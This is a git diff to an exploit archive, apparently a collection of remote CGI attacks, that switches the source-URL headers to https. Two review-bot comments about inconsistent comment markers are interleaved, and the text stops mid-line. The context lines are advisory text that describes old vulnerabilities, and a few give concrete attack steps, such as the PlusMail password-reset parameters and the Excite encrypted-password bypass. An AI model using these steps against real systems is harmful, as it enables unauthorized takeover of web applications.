Free Online Dictionary of Computing". diff --git a/exploits/cgi/remote/20689.pl b/exploits/cgi/remote/20689.pl index 1ace20c08..734afc99f 100755 --- a/exploits/cgi/remote/20689.pl +++ b/exploits/cgi/remote/20689.pl 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/2492/info +source: https://www.securityfocus.com/bid/2492/info A buffer overflow in ASPSeek versions 1.0.0 through to 1.0.3 allows for arbitrary code execution with the privileges of the web server. The vulnerable script is s.cgi and the buffer overflow can be accessed by submitting an excessively long query string to the script (the variable tmpl, specifically). diff --git a/exploits/cgi/remote/20714.txt b/exploits/cgi/remote/20714.txt index bd01c8322..f200ee758 100644 --- a/exploits/cgi/remote/20714.txt +++ b/exploits/cgi/remote/20714.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/2512/info +source: https://www.securityfocus.com/bid/2512/info Clipper is a headline-gathering tool from Anaconda! Partners which, in certain versions, is vulnerable to directory traversal attacks. diff --git a/exploits/cgi/remote/20725.txt b/exploits/cgi/remote/20725.txt index 9f6b052c1..a2378e797 100644 --- a/exploits/cgi/remote/20725.txt +++ b/exploits/cgi/remote/20725.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/2536/info +source: https://www.securityfocus.com/bid/2536/info A vulnerability exists in versions of uStorekeeper Online Shopping System from Microburst Technologies. diff --git a/exploits/cgi/remote/20744.pl b/exploits/cgi/remote/20744.pl index 455f04632..9a3782ce4 100755 --- a/exploits/cgi/remote/20744.pl +++ b/exploits/cgi/remote/20744.pl @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/2563/info +source: https://www.securityfocus.com/bid/2563/info nph-maillist is a Perl CGI script that handles mailing lists, typically used to notify interested users of site updates. A hostile user can enter commands embedded in an email address via the subscription form, and then force a mailing which will execute the commands. diff --git a/exploits/cgi/remote/20752.txt b/exploits/cgi/remote/20752.txt index cfffaeeb3..76e1c2947 100644 --- a/exploits/cgi/remote/20752.txt 
+++ b/exploits/cgi/remote/20752.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/2584/info +source: https://www.securityfocus.com/bid/2584/info The NCM Content Management System is a product distributed by NCM. The NCM Content Management System is designed to manage web material and other data, and provide an interface to databases from web resources. diff --git a/exploits/cgi/remote/20780.c b/exploits/cgi/remote/20780.c index 848441057..5e50dfc12 100644 --- a/exploits/cgi/remote/20780.c +++ b/exploits/cgi/remote/20780.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/2628/info +// source: https://www.securityfocus.com/bid/2628/info CrossWind CyberScheduler is a scheduling and calendaring package. It consists of two distinct parts for - a set of cgi scripts on a web server and a set of daemons (or services) on a database server. Both parts are available for Windows NT, Linux and a range of UNIX platforms including Solaris. diff --git a/exploits/cgi/remote/20799.c b/exploits/cgi/remote/20799.c index a01198f97..6316a9f45 100644 --- a/exploits/cgi/remote/20799.c +++ b/exploits/cgi/remote/20799.c 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/2653/info +// source: https://www.securityfocus.com/bid/2653/info PowerScripts PlusMail Web Control Panel is a web-based administration suite for maintaining mailing lists, mail aliases, and web sites. It is reportedly possible to change the administrative username and password without knowing the current one, by passing the proper arguments to the plusmail script. After this has been accomplished, the web console allows a range of potentially destructive activities including changing of e-mail aliases, mailing lists, web site editing, and various other privileged tasks. This can be accomplished by submitting the argument "new_login" with the value "reset password" to the plusmail script (typically /cgi-bin/plusmail). Other arguments the script expects are "username", "password" and "password1", where username equals the new login name, password and password1 contain matching passwords to set the new password to. diff --git a/exploits/cgi/remote/20800.c b/exploits/cgi/remote/20800.c index 827159dea..e66bfd788 100644 --- a/exploits/cgi/remote/20800.c +++ b/exploits/cgi/remote/20800.c 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/2653/info +// source: https://www.securityfocus.com/bid/2653/info PowerScripts PlusMail Web Control Panel is a web-based administration suite for maintaining mailing lists, mail aliases, and web sites. It is reportedly possible to change the administrative username and password without knowing the current one, by passing the proper arguments to the plusmail script. After this has been accomplished, the web console allows a range of potentially destructive activities including changing of e-mail aliases, mailing lists, web site editing, and various other privileged tasks. This can be accomplished by submitting the argument "new_login" with the value "reset password" to the plusmail script (typically /cgi-bin/plusmail). Other arguments the script expects are "username", "password" and "password1", where username equals the new login name, password and password1 contain matching passwords to set the new password to. diff --git a/exploits/cgi/remote/20801.c b/exploits/cgi/remote/20801.c index bb7015dde..225810660 100644 --- a/exploits/cgi/remote/20801.c +++ b/exploits/cgi/remote/20801.c 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/2653/info +// source: https://www.securityfocus.com/bid/2653/info PowerScripts PlusMail Web Control Panel is a web-based administration suite for maintaining mailing lists, mail aliases, and web sites. It is reportedly possible to change the administrative username and password without knowing the current one, by passing the proper arguments to the plusmail script. After this has been accomplished, the web console allows a range of potentially destructive activities including changing of e-mail aliases, mailing lists, web site editing, and various other privileged tasks. This can be accomplished by submitting the argument "new_login" with the value "reset password" to the plusmail script (typically /cgi-bin/plusmail). Other arguments the script expects are "username", "password" and "password1", where username equals the new login name, password and password1 contain matching passwords to set the new password to. diff --git a/exploits/cgi/remote/20808.txt b/exploits/cgi/remote/20808.txt index 56b5d2fa7..1251226bd 100644 --- a/exploits/cgi/remote/20808.txt +++ b/exploits/cgi/remote/20808.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/2663/info +source: https://www.securityfocus.com/bid/2663/info PerlCal is a CGI script written by Acme Software that allows web-based calendar sharing and related functions. diff --git a/exploits/cgi/remote/20809.html b/exploits/cgi/remote/20809.html index 106106dc5..9edb231ba 100644 --- a/exploits/cgi/remote/20809.html +++ b/exploits/cgi/remote/20809.html 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/2665/info +source: https://www.securityfocus.com/bid/2665/info Excite for Web Servers 1.1 (EWS) is a search engine suite for web servers running under Windows NT and UNIX. By default the file containing the administrative password, architext.conf, is world readable and world writable. This allows an attacker with local access to gain administrative privileges over EWS. This password is encrypted, but the attacker can bypass the normal login method and pass the encrypted password directly to the script responsible for authenticating the user - /cgi-bin/AT-generate.cgi. This can be done with the help of a simple HTML form or passed directly to the script as the "ENCRYPTEDPASS" parameter. Since the file is also world writable, the attacker could make up an "encrypted" password and overwrite the file with it, then submit the new encrypted password. diff --git a/exploits/cgi/remote/20831.txt b/exploits/cgi/remote/20831.txt index 4ab3ee1f7..42d78012d 100644 --- a/exploits/cgi/remote/20831.txt +++ b/exploits/cgi/remote/20831.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/2705/info +source: https://www.securityfocus.com/bid/2705/info A1Stats is a CGI product by Drummon Miles used to report on a website's visitor traffic. diff --git a/exploits/cgi/remote/20832.txt b/exploits/cgi/remote/20832.txt index 3235dfe3f..76af29818 100644 --- a/exploits/cgi/remote/20832.txt +++ b/exploits/cgi/remote/20832.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/2705/info +source: https://www.securityfocus.com/bid/2705/info A1Stats is a CGI product by Drummon Miles used to report on a website's visitor traffic. diff --git a/exploits/cgi/remote/20833.txt b/exploits/cgi/remote/20833.txt index 7f66150bf..15bfbcd3e 100644 --- a/exploits/cgi/remote/20833.txt +++ b/exploits/cgi/remote/20833.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/2705/info +source: https://www.securityfocus.com/bid/2705/info A1Stats is a CGI product by Drummon Miles used to report on a website's visitor traffic. diff --git a/exploits/cgi/remote/20849.pl b/exploits/cgi/remote/20849.pl index 67df3121d..385c68341 100755 --- a/exploits/cgi/remote/20849.pl +++ b/exploits/cgi/remote/20849.pl @@ -1,4 +1,4 @@ -#source: http://www.securityfocus.com/bid/2728/info +#source: https://www.securityfocus.com/bid/2728/info # #DCForum is a commercial cgi script from DCScripts which is designed to facilitate web-based threaded discussion forums. # diff --git a/exploits/cgi/remote/20878.txt b/exploits/cgi/remote/20878.txt index e9b013197..819c076e0 100644 --- a/exploits/cgi/remote/20878.txt +++ b/exploits/cgi/remote/20878.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/2762/info +source: https://www.securityfocus.com/bid/2762/info MIMAnet Source Viewer is a freely available CGI script which allows users to view the source code of files located elsewhere on the server. diff --git a/exploits/cgi/remote/20887.txt b/exploits/cgi/remote/20887.txt index 987e10272..cc7bf1516 100644 --- a/exploits/cgi/remote/20887.txt +++ b/exploits/cgi/remote/20887.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/2793/info +source: https://www.securityfocus.com/bid/2793/info Webdirectory Pro is a web application used to create a searchable directory of links developed by Cosmicperl. diff --git a/exploits/cgi/remote/20895.txt b/exploits/cgi/remote/20895.txt index 065df65a3..a626b0218 100644 --- a/exploits/cgi/remote/20895.txt +++ b/exploits/cgi/remote/20895.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/2812/info +source: https://www.securityfocus.com/bid/2812/info WebTrends Live is a web-based reporting service which provides interactive tracking of usage statistics and E-commerce revenue. 
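Review bot: in the 20780.c, 20799.c, 20800.c and 20801.c hunks only line 1 gains a comment marker (`+// source: ...`), while the description lines shown as context directly below it are still bare prose, so as far as the visible context goes the file header is still not valid C. Either wrap the whole header in one block comment or prefix every header line, and do it the same way in each of these files so the headers stay uniform.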
diff --git a/exploits/cgi/remote/20914.pl b/exploits/cgi/remote/20914.pl index b9d415b4e..003d76153 100755 --- a/exploits/cgi/remote/20914.pl +++ b/exploits/cgi/remote/20914.pl @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/2860/info +source: https://www.securityfocus.com/bid/2860/info cgiCentral's Webstore is an shopping cart application which processes and manages online purchases. diff --git a/exploits/cgi/remote/20916.pl b/exploits/cgi/remote/20916.pl index 79f426dcf..bc1e561c3 100755 --- a/exploits/cgi/remote/20916.pl +++ b/exploits/cgi/remote/20916.pl @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/2861/info +source: https://www.securityfocus.com/bid/2861/info cgiCentral's Webstore is an shopping cart application which processes and manages online purchases. diff --git a/exploits/cgi/remote/20935.pl b/exploits/cgi/remote/20935.pl index 68c3640a3..7940523b4 100755 --- a/exploits/cgi/remote/20935.pl +++ b/exploits/cgi/remote/20935.pl @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/2884/info +source: https://www.securityfocus.com/bid/2884/info uDirectory is an online directory and listing management system. diff --git a/exploits/cgi/remote/20938.txt b/exploits/cgi/remote/20938.txt index ccc8a2b2a..5810b3df0 100644 --- a/exploits/cgi/remote/20938.txt +++ b/exploits/cgi/remote/20938.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/2889/info +source: https://www.securityfocus.com/bid/2889/info DCShop is a GCI-based ecommerce system from DCScripts. diff --git a/exploits/cgi/remote/20939.txt b/exploits/cgi/remote/20939.txt index 6868a4256..2f55709ab 100644 --- a/exploits/cgi/remote/20939.txt +++ b/exploits/cgi/remote/20939.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/2889/info +source: https://www.securityfocus.com/bid/2889/info DCShop is a GCI-based ecommerce system from DCScripts. diff --git a/exploits/cgi/remote/20940.txt b/exploits/cgi/remote/20940.txt index b456c409e..74f63d5ca 100644 
--- a/exploits/cgi/remote/20940.txt +++ b/exploits/cgi/remote/20940.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/2890/info +source: https://www.securityfocus.com/bid/2890/info Tarantella Enterprise 3 is a tool for centralized management of data and applications. It is operated via a web interface. It will run on a number of Unix and Linux distributions. diff --git a/exploits/cgi/remote/20982.pl b/exploits/cgi/remote/20982.pl index a3d9d5b52..d21f99a61 100755 --- a/exploits/cgi/remote/20982.pl +++ b/exploits/cgi/remote/20982.pl @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/2942/info +source: https://www.securityfocus.com/bid/2942/info Active Classifieds is a CGI package that provides an online classified advertisement listing and management system. diff --git a/exploits/cgi/remote/21008.txt b/exploits/cgi/remote/21008.txt index a5b9a4352..5c3efab5f 100644 --- a/exploits/cgi/remote/21008.txt +++ b/exploits/cgi/remote/21008.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/3028/info +source: https://www.securityfocus.com/bid/3028/info Interactive Story is a web-based application written in Perl and is distributed as freeware. diff --git a/exploits/cgi/remote/21023.txt b/exploits/cgi/remote/21023.txt index a7d50fe02..ed6af8b0f 100644 --- a/exploits/cgi/remote/21023.txt +++ b/exploits/cgi/remote/21023.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/3081/info +source: https://www.securityfocus.com/bid/3081/info CGIWrap is a free, open-source program for running CGI securely. diff --git a/exploits/cgi/remote/21068.txt b/exploits/cgi/remote/21068.txt index 6fe2b536d..5b065f735 100644 --- a/exploits/cgi/remote/21068.txt +++ b/exploits/cgi/remote/21068.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/3175/info +source: https://www.securityfocus.com/bid/3175/info SIX-webboard 2.01 does not filter ".." and "/" from user input, allowing users to enter arbitrary values in order to view or retrieve files not normally accessible to them from the remote host. diff --git a/exploits/cgi/remote/21102.txt b/exploits/cgi/remote/21102.txt index 9c663ff71..337bd9c6c 100644 --- a/exploits/cgi/remote/21102.txt +++ b/exploits/cgi/remote/21102.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/3304/info +source: https://www.securityfocus.com/bid/3304/info Power Up HTML is a set of HTML-like commands that can be placed into web pages. It provides a central routing point to simplify programming and customization of CGI scripts. diff --git a/exploits/cgi/remote/21104.pl b/exploits/cgi/remote/21104.pl index 698f732a3..68e9a59c2 100755 --- a/exploits/cgi/remote/21104.pl +++ b/exploits/cgi/remote/21104.pl @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/3308/info +source: https://www.securityfocus.com/bid/3308/info Hassan Consulting's Shopping Cart is commercial web store software. diff --git a/exploits/cgi/remote/21125.pl b/exploits/cgi/remote/21125.pl index 5ce776957..a763f7d5e 100755 --- a/exploits/cgi/remote/21125.pl +++ b/exploits/cgi/remote/21125.pl @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/3453/info +source: https://www.securityfocus.com/bid/3453/info Mountain Network Systems WebCart is a cgi based online shopping suite. An error in the webcart.cgi script allows a remote user to pass an arbitrary shell command which will be executed by the script. diff --git a/exploits/cgi/remote/21129.java b/exploits/cgi/remote/21129.java index 4310e6138..68d74c5fb 100644 --- a/exploits/cgi/remote/21129.java +++ b/exploits/cgi/remote/21129.java 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/3476/info +source: https://www.securityfocus.com/bid/3476/info iBill is an Internet billing company that provides secure payment processing for e-commerce. diff --git a/exploits/cgi/remote/21183.txt b/exploits/cgi/remote/21183.txt index c808fd1ab..202876d4e 100644 --- a/exploits/cgi/remote/21183.txt +++ b/exploits/cgi/remote/21183.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/3698/info +source: https://www.securityfocus.com/bid/3698/info Webmin is a web-based interface for system administration for Unix. Using any browser that supports tables and forms, you can setup user accounts, Apache, DNS, file sharing and so on. Webmin will run on most Unix variants, providing it has been properly configured. diff --git a/exploits/cgi/remote/21194.txt b/exploits/cgi/remote/21194.txt index e0157f663..e84f8a42c 100644 --- a/exploits/cgi/remote/21194.txt +++ b/exploits/cgi/remote/21194.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/3759/info +source: https://www.securityfocus.com/bid/3759/info zml.cgi is a perl script which can be used to support server side include directives under Apache. It recognizes a simple set of commands, and allows access to cgi parameters and environment variables. It can run on Linux and Unix systems or any other platform with Apache and Perl support. diff --git a/exploits/cgi/remote/21249.txt b/exploits/cgi/remote/21249.txt index 5ac10a507..71f67bb7c 100644 --- a/exploits/cgi/remote/21249.txt +++ b/exploits/cgi/remote/21249.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/3976/info +source: https://www.securityfocus.com/bid/3976/info Agora.cgi is a freely available, open source shopping cart system. diff --git a/exploits/cgi/remote/21263.txt b/exploits/cgi/remote/21263.txt index 11f03129d..82954b9e9 100644 --- a/exploits/cgi/remote/21263.txt +++ b/exploits/cgi/remote/21263.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/4023/info +source: https://www.securityfocus.com/bid/4023/info FAQ-O-Matic is a freely available, open-source FAQ (Frequently Asked Questions) manager. It is intended to run on Linux and Unix variants. diff --git a/exploits/cgi/remote/21287.pl b/exploits/cgi/remote/21287.pl index ef2ef7469..84a5dc9c6 100755 --- a/exploits/cgi/remote/21287.pl +++ b/exploits/cgi/remote/21287.pl @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/4068/info +source: https://www.securityfocus.com/bid/4068/info Ezboard 2000 is a web based bulletin board system. It is available for Linux systems. diff --git a/exploits/cgi/remote/21340.pl b/exploits/cgi/remote/21340.pl index ad540b273..bf31f9297 100755 --- a/exploits/cgi/remote/21340.pl +++ b/exploits/cgi/remote/21340.pl @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/4269/info +source: https://www.securityfocus.com/bid/4269/info The Sunsolve CD is part of the Solaris Media pack. It is included as a documentation resource, and is available for the Solaris Operating Environment. diff --git a/exploits/cgi/remote/21354.txt b/exploits/cgi/remote/21354.txt index f20054d26..db6c612fd 100644 --- a/exploits/cgi/remote/21354.txt +++ b/exploits/cgi/remote/21354.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/4368/info +source: https://www.securityfocus.com/bid/4368/info csSearch is a website search script, written in Perl. It will run on most Unix and Linux variants, as well as Microsoft operating systems. diff --git a/exploits/cgi/remote/21390.txt b/exploits/cgi/remote/21390.txt index 7dc9eb538..dcb62660f 100644 --- a/exploits/cgi/remote/21390.txt +++ b/exploits/cgi/remote/21390.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/4533/info +source: https://www.securityfocus.com/bid/4533/info An issue has been discovered in Sambar Server, which could allow a user to reveal the source code of script files. 
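Review bot: line 1 of 21104.pl, 21125.pl, 21287.pl and 21340.pl (all mode 100755) and of 21129.java is rewritten as a bare `source:` line with no comment marker, whereas the .c files in this patch get `// source:` and 20849.pl already carries `#source:`. If touching these lines is meant to turn the header into a comment, use `#` for the Perl files and `//` for the Java file here as well; if only the URL scheme is in scope, say so in the commit message so the different handling of the C files is explained.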
diff --git a/exploits/cgi/remote/21415.txt b/exploits/cgi/remote/21415.txt index 394d28bec..a7aa905f7 100644 --- a/exploits/cgi/remote/21415.txt +++ b/exploits/cgi/remote/21415.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/4579/info +source: https://www.securityfocus.com/bid/4579/info CGIScript.NET csMailto is a Perl script designed to support multiple mailto: forms. A vulnerability has been reported in some versions of this script. diff --git a/exploits/cgi/remote/21641.txt b/exploits/cgi/remote/21641.txt index ba6cdfe1b..1e9404fcb 100644 --- a/exploits/cgi/remote/21641.txt +++ b/exploits/cgi/remote/21641.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/5298/info +source: https://www.securityfocus.com/bid/5298/info GNU Mailman is prone to a cross-site scripting vulnerability. Arbitrary HTML and script code are not sanitized from the URI parameters of mailing list subscribe scripts. diff --git a/exploits/cgi/remote/21642.txt b/exploits/cgi/remote/21642.txt index 689e2704e..23e818207 100644 --- a/exploits/cgi/remote/21642.txt +++ b/exploits/cgi/remote/21642.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/5299/info +source: https://www.securityfocus.com/bid/5299/info GNU Mailman is prone to a cross-site scripting vulnerability. An attacker may construct a malicious link to the administrative login page, which contains arbitrary HTML and script code. diff --git a/exploits/cgi/remote/22000.txt b/exploits/cgi/remote/22000.txt index 354fd7a4c..7bfa22a3a 100644 --- a/exploits/cgi/remote/22000.txt +++ b/exploits/cgi/remote/22000.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/6144/info +source: https://www.securityfocus.com/bid/6144/info The Zeus Web Server contains a web based administration interface that is vulnerable to cross site scripting attacks. diff --git a/exploits/cgi/remote/22054.c b/exploits/cgi/remote/22054.c index b4eb42e48..9e9d18e6c 100644 --- a/exploits/cgi/remote/22054.c 
+++ b/exploits/cgi/remote/22054.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/6281/info +// source: https://www.securityfocus.com/bid/6281/info A vulnerability has been discovered in Boozt. By passing a malicious parameter of excessive length to the index.cgi script, it is possible to overrun a buffer. This could be exploited by a remote attacker to corrupt sensitive memory, which may result in the execution of arbitrary code. diff --git a/exploits/cgi/remote/22311.txt b/exploits/cgi/remote/22311.txt index d0cfcf156..85051bf2d 100644 --- a/exploits/cgi/remote/22311.txt +++ b/exploits/cgi/remote/22311.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/6987/info +source: https://www.securityfocus.com/bid/6987/info It has been reported that the Axis Video Servers do not properly handle input to the 'command.cgi' script. Because of this, an attacker may be able to create arbitrary files that would result in a denial of service, or potentially command execution. diff --git a/exploits/cgi/remote/22312.txt b/exploits/cgi/remote/22312.txt index 9e51bd757..684aeed10 100644 --- a/exploits/cgi/remote/22312.txt +++ b/exploits/cgi/remote/22312.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/6990/info +source: https://www.securityfocus.com/bid/6990/info A file retrieval vulnerability has been reported for QuickTime/Darwin Streaming Server. The vulnerability exists due to insufficient sanitization of some parameters given to the parse_xml.cgi script. Information obtained in this manner may be used by an attacker to launch more organinzed attacks against a vulnerable system. diff --git a/exploits/cgi/remote/22355.txt b/exploits/cgi/remote/22355.txt index fabe0a4a0..02c33e8c5 100644 --- a/exploits/cgi/remote/22355.txt +++ b/exploits/cgi/remote/22355.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/7105/info +source: https://www.securityfocus.com/bid/7105/info Thunderstone TEXIS is prone to an information-disclosure vulnerability. 
diff --git a/exploits/cgi/remote/22541.txt b/exploits/cgi/remote/22541.txt index 36fa6f83d..0964171b9 100644 --- a/exploits/cgi/remote/22541.txt +++ b/exploits/cgi/remote/22541.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/7438/info +source: https://www.securityfocus.com/bid/7438/info Alt-N WebAdmin allows a remote user to access files that they should not be able to access. The remote user can submit an HTTP request that will return the contents of any webserver-readable file on the system. diff --git a/exploits/cgi/remote/22542.txt b/exploits/cgi/remote/22542.txt index b790ff5ff..eaf7c01d1 100644 --- a/exploits/cgi/remote/22542.txt +++ b/exploits/cgi/remote/22542.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/7439/info +source: https://www.securityfocus.com/bid/7439/info Reportedly, remote users can discover the installation directory of certain software on the underlying system by submitting an HTTP request to the WebAdmin server. This could allow an attacker to obtain sensitive information. diff --git a/exploits/cgi/remote/22753.pl b/exploits/cgi/remote/22753.pl index 53b358de3..15fec5f08 100755 --- a/exploits/cgi/remote/22753.pl +++ b/exploits/cgi/remote/22753.pl @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/7865/info +source: https://www.securityfocus.com/bid/7865/info mnoGoSearch 'search.cgi' has been reported prone to a buffer overflow vulnerability. diff --git a/exploits/cgi/remote/22754.pl b/exploits/cgi/remote/22754.pl index a160366ad..4bc14c293 100755 --- a/exploits/cgi/remote/22754.pl +++ b/exploits/cgi/remote/22754.pl @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/7865/info +source: https://www.securityfocus.com/bid/7865/info mnoGoSearch 'search.cgi' has been reported prone to a buffer overflow vulnerability. diff --git a/exploits/cgi/remote/23187.txt b/exploits/cgi/remote/23187.txt index d94073476..14383b45d 100644 --- a/exploits/cgi/remote/23187.txt +++ b/exploits/cgi/remote/23187.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/8705/info +source: https://www.securityfocus.com/bid/8705/info sbox has been reported prone to a path disclosure vulnerability. diff --git a/exploits/cgi/remote/23304.txt b/exploits/cgi/remote/23304.txt index 473c3a0d0..da2498417 100644 --- a/exploits/cgi/remote/23304.txt +++ b/exploits/cgi/remote/23304.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/8904/info +source: https://www.securityfocus.com/bid/8904/info It has been reported that Symantec Norton Internet Security is prone to a cross-site scripting vulnerability. The issue is reported to exist when the software blocks a restricted website and an error message containing the requested URL is returned to the user. This URL is not sanitized for malicious input therefore allowing a remote attacker to execute HTML or script code in the browser of a user running the vulnerable software. The script code would run in the context of the blocked site. diff --git a/exploits/cgi/remote/23312.txt b/exploits/cgi/remote/23312.txt index 60a2ee8da..e038d6ae7 100644 --- a/exploits/cgi/remote/23312.txt +++ b/exploits/cgi/remote/23312.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/8931/info +source: https://www.securityfocus.com/bid/8931/info A vulnerability has reported to exist in BEA Tuxedo and WebLogic Enterprise due to Tuxedo administration console. The script is reported to accept various initialization arguments such as INIFILE that are not properly sanitized for user-supplied input. This issue may allow an attacker to carry out attacks such as denial of service, file disclosure, and cross-site scripting. diff --git a/exploits/cgi/remote/23582.txt b/exploits/cgi/remote/23582.txt index 27af670b8..346ca70cd 100644 --- a/exploits/cgi/remote/23582.txt +++ b/exploits/cgi/remote/23582.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/9474/info +source: https://www.securityfocus.com/bid/9474/info thttpd is prone to a cross-site scripting vulnerability in the CGI test script. This could permit a remote attacker to create a malicious link to the web server that includes hostile HTML and script code. If this link were followed, the hostile code may be rendered in the web browser of the victim user. This would occur in the security context of the web server and may allow for theft of cookie-based authentication credentials or other attacks. diff --git a/exploits/cgi/remote/23804.txt b/exploits/cgi/remote/23804.txt index 81dce720f..cdfd17862 100644 --- a/exploits/cgi/remote/23804.txt +++ b/exploits/cgi/remote/23804.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/9848/info +source: https://www.securityfocus.com/bid/9848/info A potential remote command execution vulnerability has been discovered in the cPanel Application. This issue occurs due to insufficient sanitization of externally supplied data to the script that handles resetting user passwords. diff --git a/exploits/cgi/remote/23987.txt b/exploits/cgi/remote/23987.txt index 078c7873f..2d067d998 100644 --- a/exploits/cgi/remote/23987.txt +++ b/exploits/cgi/remote/23987.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/10103/info +source: https://www.securityfocus.com/bid/10103/info SurgeLDAP is prone to a directory traversal vulnerability in one of the scripts included with the built-in web administrative server, potentially resulting in disclosure of files. diff --git a/exploits/cgi/remote/24326.txt b/exploits/cgi/remote/24326.txt index b9f986ebe..2a06ec3c9 100644 --- a/exploits/cgi/remote/24326.txt +++ b/exploits/cgi/remote/24326.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/10812/info +source: https://www.securityfocus.com/bid/10812/info RiSearch and RiSearch Pro are reported prone to an open proxy vulnerability. It is reported that the issue presents itself due to a lack of sufficient sanitization performed on user supplied URI parameters. diff --git a/exploits/cgi/remote/24327.txt b/exploits/cgi/remote/24327.txt index eb9bcd64b..b41b476bf 100644 --- a/exploits/cgi/remote/24327.txt +++ b/exploits/cgi/remote/24327.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/10812/info +source: https://www.securityfocus.com/bid/10812/info RiSearch and RiSearch Pro are reported prone to an open proxy vulnerability. It is reported that the issue presents itself due to a lack of sufficient sanitization performed on user supplied URI parameters. diff --git a/exploits/cgi/remote/24336.txt b/exploits/cgi/remote/24336.txt index 01a8d6ec4..fe635b8c0 100644 --- a/exploits/cgi/remote/24336.txt +++ b/exploits/cgi/remote/24336.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/10831/info +source: https://www.securityfocus.com/bid/10831/info Reportedly MyServer is affected by multiple remote vulnerabilities in the 'math_sum.mscgi' example script. These issues are due to a boundary condition error and a failure to properly sanitize user-supplied URI input. diff --git a/exploits/cgi/remote/24337.txt b/exploits/cgi/remote/24337.txt index b419462a1..0ec569a29 100644 --- a/exploits/cgi/remote/24337.txt +++ b/exploits/cgi/remote/24337.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/10831/info +source: https://www.securityfocus.com/bid/10831/info Reportedly MyServer is affected by multiple remote vulnerabilities in the 'math_sum.mscgi' example script. These issues are due to a boundary condition error and a failure to properly sanitize user-supplied URI input. diff --git a/exploits/cgi/remote/24342.txt b/exploits/cgi/remote/24342.txt index 8d0308b33..6f1874227 100644 
--- a/exploits/cgi/remote/24342.txt +++ b/exploits/cgi/remote/24342.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/10837/info +source: https://www.securityfocus.com/bid/10837/info Reportedly Webcam Corp Webcam Watchdog is affected by a remote cross-site scripting vulnerability in the sresult.exe binary. This issue is due to a failure of the application to properly sanitize user-supplied input prior to including it in dynamically generated web content. diff --git a/exploits/cgi/remote/25648.txt b/exploits/cgi/remote/25648.txt index 75afef956..e874f504b 100644 --- a/exploits/cgi/remote/25648.txt +++ b/exploits/cgi/remote/25648.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13596/info +source: https://www.securityfocus.com/bid/13596/info NexusWay is reportedly affected by multiple remote vulnerabilities. These issues can allow an unauthorized attacker to execute arbitrary commands and gain administrative access to an affected device. diff --git a/exploits/cgi/remote/26768.txt b/exploits/cgi/remote/26768.txt index d92bc1ef0..4151ab3c4 100644 --- a/exploits/cgi/remote/26768.txt +++ b/exploits/cgi/remote/26768.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15779/info +source: 